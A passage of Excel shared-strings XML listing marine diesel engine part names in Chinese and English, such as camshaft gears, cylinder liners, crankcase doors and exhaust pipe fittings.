        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸安全阀本体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放阀阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器测试泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀本体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内件螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔径规</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧储罐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套拆检箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水管支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油侧支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对焊管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动滑油管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绞制螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>CAM SHAFT SHIFTING GEAR COMPLETE
WITH STOPPER LIMIT SWITCH</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴移动装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <t>CAMSHAFT DRIVING GEAR HOUSING  1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <t>CAMSHAFT GEAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>GEAR</t>
    </r>
  </si>
  <si>
    <r>
      <t>CAMSHAFT GEAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>GEAR WHEEL</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力止动块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切换阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查阀</t>
    </r>
  </si>
  <si>
    <r>
      <t>COLUMN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形弹性垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和轴承装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位开关保护板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架钻孔图</t>
    </r>
  </si>
  <si>
    <r>
      <t>CRANK CASE ASSEMBLY 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>道门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>道门（排气侧）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>道门装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>道门橡胶圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱油雾管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱油雾管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱凸轮轴箱泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱凸轮轴箱泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头中间块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水进口管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸器油缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水支管出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套水出口总管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套水泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套水泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYLINDER HEAD 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖冷却水套</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYLINDER JACKET</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYLINDER JACKET</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体道门</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYLINDER LINER</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYLINDER LINER</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O RING</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器喷油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器喷油器总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轴</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYLINDER LUBRICATOR DRIVING GEAR ASSEMBLY</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器驱动装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表减震器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拐档表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出油阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>深度尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头呆板手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双层垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动油泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>DRIVING GEAR LOWER PART ASSEMBLY 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部驱动装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防尘环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机走台和扶手装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动管</t>
    </r>
  </si>
  <si>
    <r>
      <t>EXHAUST PIPE  1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管支撑装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管支撑板</t>
    </r>
  </si>
  <si>
    <r>
      <t>EXHAUST VALVE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
